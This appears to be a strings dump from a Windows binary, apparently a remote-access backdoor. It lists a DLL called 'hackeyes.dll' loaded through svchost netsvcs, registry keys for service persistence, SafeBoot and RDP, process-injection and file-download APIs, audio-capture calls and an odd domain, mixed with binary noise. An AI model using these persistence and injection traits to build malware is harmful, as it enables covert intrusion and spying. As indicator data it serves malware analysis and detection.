NT\CurrentVersion\Svchost SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SOFTWARE\Policies\Microsoft\Windows\Installer \\%s\pipe \\%s\pipe\browser ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ sprintf =+=`=S>r>w> %s%s*.* =:=S=s= %s\%s%d.exe %s\%s.dll SSDPSRV ssdpsrv.dll %s\SHELL\OPEN\COMMAND %s\%s\%s %s%s\%s %s%s%s StartServiceA strchr _strcmpi stream end stream error strncat strncmp strncpy _strnicmp strrchr strstr \SUVWhP SVWhDdk h$ SVWQRj swsocknetman1ssdp %s X -ibck "%s" "%s\" System \system32 SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal SYSTEM\CurrentControlSet\Control\SafeBoot\Network SYSTEM\CurrentControlSet\Control\Terminal Server SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp system\cURRENTcONTROLsET\sERVICES\ SYSTEM\CurrentControlSet\Services system\cURRENTcONTROLsET\sERVICES\%s SYSTEM\CurrentControlSet\Services\TermDD SYSTEM\CurrentControlSet\Services\TermService SYSTEM\Current%s\%s SystemParametersInfoA %SystemRoot%\system32\hackeyes.dll %SystemRoot%\System32\svchost.exe -k netsvcs System Volume Information |$-[t. T$0QRP T+3x%A Tapisrv tapisrv.dll T$DPVS T$dQRP TerminateProcess TerminateThread .textVT T$ Fj:V T$(Fj:V Themes _This #g !This program cannot be run in DOS mode. Thread32First Thread32Next ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z tJ<\u8 |$<.tK T$LPQR T$LRWS too many length or distance symbols T$,PQhX@ T$(PQR T$ QRj tqSUVj2W TransactNamedPipe TranslateMessage T$ RQPV T$,RWV TSEnabled t-</t)F tTisrv t$ WSPVR ?%_#txg tZ9H tU9H$tP >"u:F@ UnhookWindowsHookEx unknown compression method UnmapViewOfFile upnphost upnphost.dll #upnphostKn&s URLDownloadToFileA urlmon.dll USER32.dll User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E) UuidFromStringA UuidToStringA \$ UVW :@;v;{; V3_3o3x3 V6sion\ VDPQRUSP v|htcL VirtualAlloc VirtualAllocEx VirtualFree VirtualProtect <;<V<i<u< V@j QR +*%*+vp*vCpuC VVVVh0 VVVVVV VVVVVVYUhbMC+Fnw== ?'?.?w? |w9=trW W(9W$u WaitForMultipleObjects WaitForSingleObject waveInAddBuffer waveInClose waveInGetNumDevs waveInOpen waveInPrepareHeader waveInReset waveInStart waveInStop waveInUnprepareHeader waveOutClose waveOutGetNumDevs waveOutOpen waveOutPrepareHeader waveOutReset waveOutUnprepareHeader waveOutWrite wcscpy wcstombs WideCharToMultiByte WindowFromPoint WINDOWS Windows Media Player Windows NT WindowsUpdate WinExec WININET.dll Winlogon WINMM.dll WinRAR winsta0 winsta0\default WinSta0\Default WINTRUST.dll WinVerifyTrust WithTag WmdmPmSN WmdmPmSN'Fa WNetAddConnection2A WNetCloseEnum WNetEnumResourceA WNetOpenEnumA WO$_9E WriteFile WriteProcessMemory Ws2_32.dll WS2_32.dll WSAAddressToStringA WSACreateEvent WSAIoctl WSARecvFrom WSAResetEvent WSASocketA wsprintfA WTSAPI32.dll WTSFreeMemory WTSQuerySessionInformationA |$ WUSV |$ WVU WWRhP[ www.490a-B8B5-9B8C1E870B0C.com www.baidu.com WWWWWW WWWWWWnw== < =x=}= _XcptFilter <)<.<X<i<o <)<.<X<i<o< xmlpbS xmlprov xmlprov.dll {+xN{tEODBE XPTPSW XPVSSG ?_Xran@std@@YAXXZ XRichS xwuLEwE /;%y;~; .y!GN& *y/.uzyzuEFzG @z}]u2o ZwClose ZwCreateKey ZwOpenKey ZwQueryInformationThread ZwSetValueKey